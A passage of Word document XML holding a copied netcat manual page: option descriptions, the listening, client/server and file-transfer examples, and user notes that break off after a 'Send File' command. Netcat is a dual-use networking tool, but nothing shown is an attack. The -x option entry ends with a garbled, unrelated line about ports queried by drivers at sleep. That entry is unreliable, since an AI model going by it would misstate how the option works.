    <w:p w14:paraId="26BC1E80" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="19EADAB6" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -k      Forces nc to stay listening for another connection after its current connec-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D53329" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             tion is completed.  It is an error to use this option without the -l option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B188AD4" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="0792C62E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -l      Used to specify that nc should listen for an incoming connection rather than</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C97A0D" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             initiate a connection to a remote host.  It is an error to use this option in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C060F" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             conjunction with the -p, -s, or -z options.  Additionally, any timeouts spec-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45615646" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             ified with the -w option are ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423799B1" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="6A0FE21B" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -L num_probes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E621898" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             Number of probes to send to the peer before declaring that the peer is not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145689EA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             reachable and generating an adpative timeout read/write event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F591E0" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="25EA1D3C" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -n      Do not do any DNS or service lookups on any specified addresses, hostnames or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21705EFD" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8E1BB" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="5CF8AA42" w14:textId="11E3AD7C" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r w:rsidRPr="00377AAF">
        <w:t>-p source_port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582B3055" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00377AAF">
        <w:t>Specifies the source port nc should use, subject to privilege restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEA19FA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             and availability.  It is an error to use this option in conjunction with the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF35148" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             -l option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4781F93E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="6043A14E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -r      Specifies that source and/or destination ports should be chosen randomly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9008C0" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             instead of sequentially within a range or in the order that the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC784E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             assigns them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289017E9" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="3AF21BBD" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -s source_ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EF02F" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             Specifies the IP of the interface which is used to send the packets.  It is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF122B3" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             an error to use this option in conjunction with the -l option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CD0EF5" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="2CC3B65B" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -t      Causes nc to send RFC 854 DON'T and WON'T responses to RFC 854 DO and WILL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B37835E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             requests.  This makes it possible to use nc to script telnet sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7A3D6" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="5F1517CA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -U      Specifies to use Unix Domain Sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473E926C" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="4684249B" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -u      Use UDP instead of the default option of TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D3350" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="1C265836" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -v      Have nc give more verbose output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0612C26C" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="18B9628F" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -w timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06B9B4" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             If a connection and stdin are idle for more than timeout seconds, then the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0EF93E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             connection is silently closed.  The -w flag has no effect on the -l option,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157CAAF9" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             i.e. nc will listen forever for a connection, with or without the -w flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB7D837" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             The default is no timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE93F1" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="40AE55D9" w14:textId="230A1E8B" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00377AAF">
        <w:t>-X proxy_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2042BD" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             Requests that nc should use the specified protocol when talking to the proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAD55DB" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             server.  Supported protocols are ``4'' (SOCKS v.4), ``5'' (SOCKS v.5) and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C37C83" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             ``connect'' (HTTPS proxy).  If the protocol is not specified, SOCKS version 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018C9226" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             is used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF6625" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="178E3E9C" w14:textId="4D6ABC2A" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00377AAF">
        <w:t>-x proxy_address[:port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4704A93F" w14:textId="0B05FBA5" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="700"/>
      </w:pPr>
      <w:r w:rsidRPr="00377AAF">
        <w:t>Requests that nc should connect to hostname using a proxy at proxy_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7617CF" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             opened ports that is queried by drivers when the system goes to sleep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537C2B0D" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00296C68" w:rsidRDefault="00377AAF" w:rsidP="00296C68"/>
    <w:p w14:paraId="3F1A2EA2" w14:textId="77777777" w:rsidR="00296C68" w:rsidRPr="00296C68" w:rsidRDefault="00377AAF" w:rsidP="00296C68">
      <w:r w:rsidRPr="00296C68">
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidR="00296C68" w:rsidRPr="00296C68">
        <w:t>-z      Specifies that nc should just scan for listening daemons, without sending any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BCB73" w14:textId="77777777" w:rsidR="00296C68" w:rsidRPr="00296C68" w:rsidRDefault="00296C68" w:rsidP="00296C68">
      <w:r w:rsidRPr="00296C68">
        <w:t>             data to them.  It is an error to use this option in conjunction with the -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A38E960" w14:textId="77777777" w:rsidR="00296C68" w:rsidRPr="00296C68" w:rsidRDefault="00296C68" w:rsidP="00296C68">
      <w:r w:rsidRPr="00296C68">
        <w:t>             option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F91853E" w14:textId="38A8CF01" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00296C68"/>
    <w:p w14:paraId="4CB17510" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     hostname can be a numerical IP address or a symbolic hostname (unless the -n option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE4C2F9" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     is given).  In general, a hostname must be specified, unless the -l option is given</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918B455" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     (in which case the local host is used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CAED9C" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="1B0A2D26" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     port[s] can be single integers or ranges.  Ranges are in the form nn-mm.  In general,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072DC79" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     a destination port must be specified, unless the -U option is given (in which case a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01810DB7" w14:textId="213C67D8" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r w:rsidRPr="00377AAF">
        <w:t>socket must be specified).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C16B41" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25688B08" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA3C1E7" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AFCDE3" w14:textId="74ECC739" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:bookmarkStart w:id="1" w:name="OLE_LINK1"/>
      <w:bookmarkStart w:id="2" w:name="OLE_LINK2"/>
      <w:r w:rsidRPr="00377AAF">
        <w:t>CLIENT/SERVER MODEL</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="107A4F37" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     It is quite simple to build a very basic client/server model using nc.  On one con-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3DAAFA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     sole, start nc listening on a specific port for a connection.  For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD502ED" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="75DE0A39" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc -l 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B1B86" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="109BD666" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     nc is now listening on port 1234 for a connection.  On a second console (or a second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457CBE0D" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     machine), connect to the machine and port being listened on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D93DF00" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="0CDEDA85" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc 127.0.0.1 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C71D9C9" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="16BCDA13" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     There should now be a connection between the ports.  Anything typed at the second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6606CD83" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     console will be concatenated to the first, and vice-versa.  After the connection has</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0706CA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     been set up, nc does not really care which side is being used as a `server' and which</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C31F2" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     side is being used as a `client'.  The connection may be terminated using an EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29350475" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     (`^D').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AA8946" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F939F43" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="0DD079F7" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="77CB1501" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48725960" w14:textId="37529FD9" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>DATA TRANSFER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DBA1E6" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     The example in the previous section can be expanded to build a basic data transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DECF38" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     model.  Any information input into one end of the connection will be output to the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC068F1" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     other end, and input and output can be easily captured in order to emulate file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386B7F9" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724C9DCD" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="004EB338" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     Start by using nc to listen on a specific port, with output captured into a file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E14A1" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="76AA418C" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc -l 1234 &gt; filename.out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA19702" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="5E2B315E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     Using a second machine, connect to the listening nc process, feeding it the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A11D6EA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     which is to be transferred:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E9AD6" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="0336D6B1" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc host.example.com 1234 &lt; filename.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D6FAB2" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="775C79EC" w14:textId="6A0B3AC4" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r w:rsidRPr="00377AAF">
        <w:t>After the file has been transferred, the connection will close automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DCF10E" w14:textId="77777777" w:rsidR="001217AF" w:rsidRDefault="001217AF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37184BA0" w14:textId="77777777" w:rsidR="001217AF" w:rsidRDefault="001217AF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1A130A" w14:textId="5AA201A6" w:rsidR="001217AF" w:rsidRDefault="001A137A" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r>
        <w:t>Instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5894AC47" w14:textId="159A695F" w:rsidR="001A137A" w:rsidRDefault="001A137A" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r>
        <w:t>Send File:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14261FB0" w14:textId="6659C5A0" w:rsidR="001A137A" w:rsidRDefault="001A137A" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r>
        <w:t>Cat [file name] | nc –v –l [port number]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF81D0" w14:textId="77777777" w:rsidR="001A137A" w:rsidRDefault="001A137A" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
